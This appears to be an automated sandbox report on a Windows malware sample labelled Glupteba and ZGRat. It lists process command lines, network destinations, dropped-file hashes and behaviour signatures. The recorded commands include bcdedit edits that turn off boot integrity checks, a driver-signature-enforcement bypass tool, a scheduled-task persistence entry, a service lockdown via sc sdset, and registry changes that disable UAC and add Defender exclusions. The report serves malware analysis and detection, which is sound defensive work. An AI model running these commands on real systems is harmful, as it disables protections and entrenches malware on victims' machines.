"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 nic-it.nl udp
RU 193.233.132.234:80 tcp
RU 193.233.132.234:80 tcp
US 8.8.8.8:53 onlycitylink.com udp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 onlycitylink.com udp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 yip.su udp
DE 138.201.79.103:80 nic-it.nl tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 172.67.193.79:443 realdeepai.org tcp
US 104.21.90.14:443 realdeepai.org tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 188.114.97.2:443 yip.su tcp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
DE 185.172.128.90:80 185.172.128.90 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
DE 185.172.128.150:80 185.172.128.150 tcp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.50:80 download.iolo.net tcp
US 8.8.8.8:53 860c4dfd-593b-411f-a2f4-b05741cd854f.uuid.allstatsin.ru udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 server7.allstatsin.ru udp
US 8.8.8.8:53 stun.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 74.125.250.129:19302 stun.l.google.com udp
BG 185.82.216.104:443 server7.allstatsin.ru tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
BG 185.82.216.104:443 server7.allstatsin.ru tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
BG 185.82.216.104:443 server7.allstatsin.ru tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp

Files

memory/2872-0-0x000007FEF5C73000-0x000007FEF5C74000-memory.dmp

memory/2872-1-0x0000000001070000-0x000000000107A000-memory.dmp

memory/2872-2-0x0000000000E20000-0x0000000000E7E000-memory.dmp

memory/2872-3-0x000007FEF5C70000-0x000007FEF665C000-memory.dmp

memory/2512-13-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2512-11-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2512-9-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2512-8-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2512-7-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2512-6-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2512-5-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2512-4-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2984-18-0x000000001B740000-0x000000001BA22000-memory.dmp

memory/2984-19-0x0000000001E10000-0x0000000001E18000-memory.dmp

\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe

MD5 0548c8fb97a0beb199aafecc2be8acb4
SHA1 d694cdfe61f922c4433d0549e5ff31e1c490bcab
SHA256 283a84dafeb6ce11cce61dcb92acc91f1d284aea06bf4b71024cfd1ad4f9ff46
SHA512 aa36040a2f815f2eeb65041d6a3cd3acd7c62d17f1432ae87269fbdf6162b9d72f695d86af1aba8d1223080b4b8d7deea25b423d73e5b4219bcd8111ce029cbe

C:\Users\Admin\AppData\Local\Temp\Tar5AB4.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\Local\Temp\Cab5AB0.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

MD5 d4ae187b4574036c2d76b6df8a8c1a30
SHA1 b06f409fa14bab33cbaf4a37811b8740b624d9e5
SHA256 a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7
SHA512 1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar5B85.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dcbf3818db5944b6adf17f41a0a28750
SHA1 57fa07ac645ed3dc043482643b244a3018b55022
SHA256 18bdc77c48b37f66b59fe15b6efc42b80e4eaaf59b79a8898c5e7f55ec2e2b89
SHA512 aaed78f55f6a4d1fc8eb4c38285741a0d7bb570f9a64fa3e61d491af5411b6092db61ce70bfb24f3bc9b8e822badd09e04653cd31566b76bd2944d29eaf94693

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bed576f5fbd09b243473bc558de35254
SHA1 d2a260dae35b7a924cae8b0913591e73ccfe08c9
SHA256 36850867f7ec4036e62cbe03e03c6d2c59488c6aee6dbbaf43e660655728f652
SHA512 e5eca1969efa38753fa2e8634cad4a4521f3a850d8b22dbba1602bfab19ae4385f1dfd4762b9b665c3b83362022f9042d2a462bd546c4722753bd0b05ec93347

\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe

MD5 cae69d5c81409ec9162f8bd1b07533f7
SHA1 9aea0a70c0fc3b60df129f9c3d5a42a0eaafae68
SHA256 be5f5f4dc0731d21d0193287437c41a21ca8981d7970beaeecceaf3962568aab
SHA512 34977a5194cbf947deb5e0705baad4d20fd06c600580736269de96ef1ab0e5f6f6b8f3d9d8203999d926ef1c337d28f08aa92af4f86df7201714fbf5b137de69

C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe

MD5 7341c4e85f4d8f7c00616b3fbbb73204
SHA1 b164950d93fd0b5fa51a6796c9cf79051a90e2cc
SHA256 12cb93fa727511eecd5a7721b71eae16305bb700a748be745bbce4ab6e65be4b
SHA512 83b519c34a9e52f526755d91fe0ff19716d1fedb9552f1e8da66ba59b45782bb173b8f926dff2e5cf0681fb6cfda485823f6aee190bc0ec804008059849e7f1d

memory/1952-291-0x00000000042E0000-0x00000000046D8000-memory.dmp

memory/2856-292-0x0000000004150000-0x0000000004548000-memory.dmp

memory/1960-293-0x0000000004330000-0x0000000004728000-memory.dmp

memory/308-294-0x0000000000400000-0x0000000002599000-memory.dmp

memory/2856-299-0x0000000000400000-0x0000000002958000-memory.dmp

\Users\Admin\AppData\Local\Temp\u8k.0.exe

MD5 adaa7779ccd1879d9466706724ca2974
SHA1 af546b538b5362ee19131e8d30b633c817417d15
SHA256 7109bdc186a84c29affbe2882b747b8c32587ce4e8d4b39e770faa06d94431d8
SHA512 96fa1c074b4f268393f17b400711898178ce8479272d5b6ca1405568dbe63cc618b46bfb5b80a8b97a7a796f6d4b60c3727beb2b2a13d7e749b3746b736bff87

\Users\Admin\AppData\Local\Temp\u8k.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/308-328-0x0000000000400000-0x0000000002599000-memory.dmp

memory/1044-333-0x00000000043F0000-0x00000000047E8000-memory.dmp

memory/2040-354-0x0000000070D20000-0x0000000070D26000-memory.dmp

memory/2040-353-0x0000000070D30000-0x0000000070D36000-memory.dmp

memory/2040-349-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1952-348-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1960-352-0x0000000000400000-0x0000000002958000-memory.dmp

memory/2040-360-0x0000000070CC0000-0x0000000070CCF000-memory.dmp

memory/2040-359-0x0000000070CD0000-0x0000000070CE7000-memory.dmp

memory/2872-361-0x000007FEF5C73000-0x000007FEF5C74000-memory.dmp

memory/664-366-0x0000000004210000-0x0000000004608000-memory.dmp

memory/808-375-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 703c06a2d6533a8f8d65ee25e04b45f0
SHA1 4d9e12da67111de2fe55281864a18b66bea31fb6
SHA256 e524b6a3480e4063c7211895e273e2cca0c87a3d19053e7f7b6500b6001d4b38
SHA512 ade7fab886d90df4e34c9218e33d4e4e81d6e2c2a26457288f2c8e75a3b7026363a864a8e90d23ada8214ac65eccf8b63445565fe7970f5004f5f0daacbccbcb

memory/532-408-0x0000000004220000-0x0000000004618000-memory.dmp

memory/2872-417-0x000007FEF5C70000-0x000007FEF665C000-memory.dmp

memory/808-413-0x0000000000400000-0x0000000002575000-memory.dmp

memory/1044-412-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1464-418-0x0000000004470000-0x0000000004868000-memory.dmp

memory/532-428-0x0000000000400000-0x0000000002958000-memory.dmp

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

memory/664-451-0x0000000000400000-0x0000000002958000-memory.dmp

memory/808-452-0x0000000000400000-0x0000000002575000-memory.dmp

memory/1748-453-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1464-454-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1044-455-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1084-456-0x0000000004180000-0x0000000004578000-memory.dmp

memory/1464-457-0x0000000000400000-0x0000000002958000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/2924-470-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

memory/2924-478-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 654ffa345718afd9587d0c691a7c099e
SHA1 067258637afd4837ec608126a45eacf0022b45db
SHA256 270fa4011cee954e1dcddc1760cfe544aa30e2b8772428fddc0a533d4198d970
SHA512 6b495c1aefc666e2492473cf9de6742eb9473719312ab96795c0409049109c5270fe5513d6cc3731c2dda39eb52f2c8f5cbd03146699472a60e6b6629439834c

memory/1748-509-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1740-510-0x0000000000870000-0x00000000040A4000-memory.dmp

memory/1740-522-0x000000001E040000-0x000000001E04C000-memory.dmp

memory/1740-521-0x0000000000740000-0x0000000000750000-memory.dmp

memory/1740-520-0x000000001E960000-0x000000001EA6A000-memory.dmp

memory/1740-523-0x0000000000750000-0x0000000000764000-memory.dmp

memory/1740-524-0x000000001EA80000-0x000000001EAA4000-memory.dmp

memory/1740-532-0x000000001EB30000-0x000000001EBE2000-memory.dmp

memory/1740-531-0x0000000000710000-0x000000000073A000-memory.dmp

memory/1740-530-0x00000000006E0000-0x00000000006EA000-memory.dmp

memory/1740-533-0x00000000006F0000-0x00000000006FA000-memory.dmp

memory/1740-537-0x000000001FB00000-0x000000001FE00000-memory.dmp

memory/1740-539-0x00000000057E0000-0x00000000057EA000-memory.dmp

memory/1740-542-0x0000000005910000-0x0000000005932000-memory.dmp

memory/1740-541-0x000000001F3E0000-0x000000001F442000-memory.dmp

memory/1740-540-0x0000000005900000-0x000000000590A000-memory.dmp

memory/1740-545-0x0000000005930000-0x000000000593C000-memory.dmp

memory/1084-546-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1084-580-0x0000000000400000-0x0000000002958000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\a34b5051478c01d83934dd5b0120757f7e5ff041b03ce291cb3621788d299269\d78301e574404b5487f84ab89551d4d4.tmp

MD5 1aec7b605d3b43e19eff677c38b75606
SHA1 e2be58b7ff143f09b84ebe1a1de869bdb469fe5f
SHA256 b0dd506574e8fe2f8bc65cd327be625ed4a3780cc2d45c02fc090f79d2277144
SHA512 7a604995dd68c35d32e0ebddd71001ac4328fb5bb8356b9323e762fb52216ae431d47a4f0f0a894cd8ca906e9cf0dee3f897e10bd09ca2d9bc42940800a08787

memory/1084-589-0x0000000000400000-0x0000000002958000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

memory/1084-623-0x0000000000400000-0x0000000002958000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/800-627-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2120-630-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/800-632-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1084-633-0x0000000000400000-0x0000000002958000-memory.dmp

memory/2120-634-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1084-636-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1084-643-0x0000000000400000-0x0000000002958000-memory.dmp

memory/2120-644-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1084-645-0x0000000000400000-0x0000000002958000-memory.dmp

memory/1084-647-0x0000000000400000-0x0000000002958000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-10 08:27

Reported

2024-05-10 08:30

Platform

win10v2004-20240508-en

Max time kernel

115s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\sbL18U8mj7OfoNwCqPxqbUrY.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asAheTdhCAIm9CQNLQD0rOyN.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SvfrmvKdhBvUqKO4S0gOXkTu.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5en6Erc4OYeal8BONOTdbHGe.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L0iFTrBQXAnAVpYr34cocPEG.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\s3NPb6g6wbs1UE0fiYBIeyjt.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\m8cPA2SXtxGNIP20CULLqvRC.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZGF2DtoM4wuljmHA4CvB70hE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A
